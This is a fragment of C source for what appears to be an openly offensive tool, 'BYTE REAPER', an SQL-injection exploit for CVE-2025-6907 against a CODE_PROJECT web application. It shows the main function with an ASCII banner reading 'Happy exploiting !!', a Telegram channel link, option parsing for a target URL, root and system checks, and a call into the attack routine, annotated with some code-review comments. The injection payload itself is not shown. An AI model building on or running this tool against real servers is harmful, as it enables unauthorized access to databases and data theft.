        "⠀⠀⠀⠀⠀⢸⣿⣿⣦⡀⣼⣿⣿⣷⡀⢠⣿⣿⣿⡆⢀⣾⣿⣿⡇⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⠋⠙⢿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠠⣤⣉⣙⠛⠛⠛⠿⠿⠁⣴⣦⡈⠻⠛⠛⠛⢛⣉⣁⡤⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⠈⠉⠛⠻⠿⠶⣶⣆⠈⢿⡿⠃⣠⣶⡿⠿⠟⠛⠉⠀⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⢠⣿⣿⣶⣶⣤⣤⣤⣤⡀⢁⣠⣤⣤⣤⣶⣶⣿⣿⡀⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⣸⣿⡏⠉⠙⠛⠿⢿⣿⣿⣾⣿⡿⠿⠛⠋⠉⠹⣿⡇⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⠻⢿⣧⣀⠀⠀⣀⣀⣼⡿⣿⣯⣀⣀⠀⠀⣀⣼⡿⠗⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⠀⠀⠙⠻⣿⣿⣿⣿⣿⠁⠘⣿⣿⣿⣿⣿⠟⠉⠀⠀⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣇⣀⣀⣹⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⠿⣿⡿⢿⣿⠿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⡇⢀⣿⡇⢸⣿⡀⢸⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
    );
    printf("\e[1;31m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■\n");
    printf("■ \e[1;37m BYTE REAPER | CVE-2025-6907 SQLI TOOL \e[1;31m\n");
    printf("■ \e[1;32m Target : CODE_PROJECT \e[1;31m\n");
    printf("■ \e[1;34m Channel: https://t.me/exploiterX0 \e[1;31m\n");
    printf("\e[0;32m■ -> Happy exploiting !!\n");
    printf("\e[1;31m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■\n\n");
    printf("\e[1;37m-----------------------------------------------------------------------------------------------------------------------------------------------------------\n");
    const char *targetUrl = NULL;
    int run = 0;
    int showH = 0;
    /* `yourUse` is not used anywhere in this function. */
    const char *yourUse = NULL;
    /* Both gates run before option parsing, so even -h requires root. */
    runRoot();
    checkSystem();
    struct argparse_option options[] = {
        OPT_BOOLEAN('h', "help", &showH, "Show detailed help"),
        OPT_STRING('u', "url", &targetUrl, "Enter Target URL"),
        OPT_BOOLEAN('r', "response", &run, "This Argument For Show Response Server"),
        OPT_STRING('i', "input", &inputUrl, "Enter FULL URL"),
        OPT_BOOLEAN('c', "check", &runS, "Argument to check Service CODE_PROJECT and File,Folder,Apache, process..."),
        OPT_BOOLEAN( 'v', "verbose", &verbose, "Verbose Mode"),
        OPT_END(),
    };
    struct argparse argparse;
    argparse_init(&argparse, options, NULL, 0);
    argparse_parse(&argparse, argc, argv);
    useFullurl = (inputUrl != NULL);
    const char *url = inputUrl ? inputUrl : targetUrl;
    showResponse = run ;
    if(showH) {
        showHelp();
    }
    if (runS && !url) {
        checkFile();
        checkProccess();
        return 0;
    }
    if (!runS && !url) {
        printf("\e[1;31m\n[-] Please Enter Target URL !\n");
        printf("\e[1;33m[!] Exemple : ./exploit -u http://192.168.1.100/book_car.php\n");
        /*
         * Raw exit syscall (60) with status 0.
         * NOTE(review): this reports success for a usage error and bypasses
         * libc's exit handling, so output still held in stdio buffers (for
         * example when stdout is a pipe) may never be written.
         */
        __asm__ volatile (
            "mov $60, %%rax\n\t"
            "xor %%rdi, %%rdi\n\t"
            "syscall\n\t"
            :
            :
            :"rax", "rdi"
        );
    }
    if (runS && url) {
        checkFile();
        checkProccess();
    }
    if (verbose) {
        /* The assignment is redundant: verbose is already non-zero here. */
        verbose = 1;
        printf("\e[0;34m[+] Verbose Mode Run...\n");
        printf("\e[0;34m[+] Show Memory Location Run...\n");
        memory();
    }
    e(url);
    return 0;
}